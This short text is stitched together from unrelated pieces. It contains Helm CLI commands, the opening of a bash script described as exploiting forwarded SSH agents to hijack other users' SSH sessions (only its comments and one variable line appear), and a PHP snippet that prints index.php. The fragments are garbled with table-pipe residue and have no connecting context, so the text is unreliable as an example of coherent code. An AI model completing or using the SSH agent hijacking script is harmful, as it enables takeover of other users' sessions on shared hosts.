helm search repo $REPO_NAME
helm search hub $CHART_NAME
helm list -A
helm list -n $NAMESPACE
#!/bin/bash | |
# | |
# Simple portable bash script to exploit insecure forwarded SSH agent | |
# When agent_forwarding is enabled, this allows every local user which | |
# has access to the ssh agent's dir (commonly /tmp) to hijack other ssh sessions | |
# | |
# See more about this technique on https://book.hacktricks.xyz/linux-hardening/privilege-escalation/ssh-forward-agent-exploitation | |
# Defaults values to watch (/tmp dir, every second, can be overrided by cmdline args) | |
AGENT_DIR="${1:-/tmp}" |
<?php | |
$myfile = fopen("index.php", "r") or die("Unable to open file!"); | |
echo fread($myfile,filesize("index.php")); | |
fclose($myfile); | |
?> |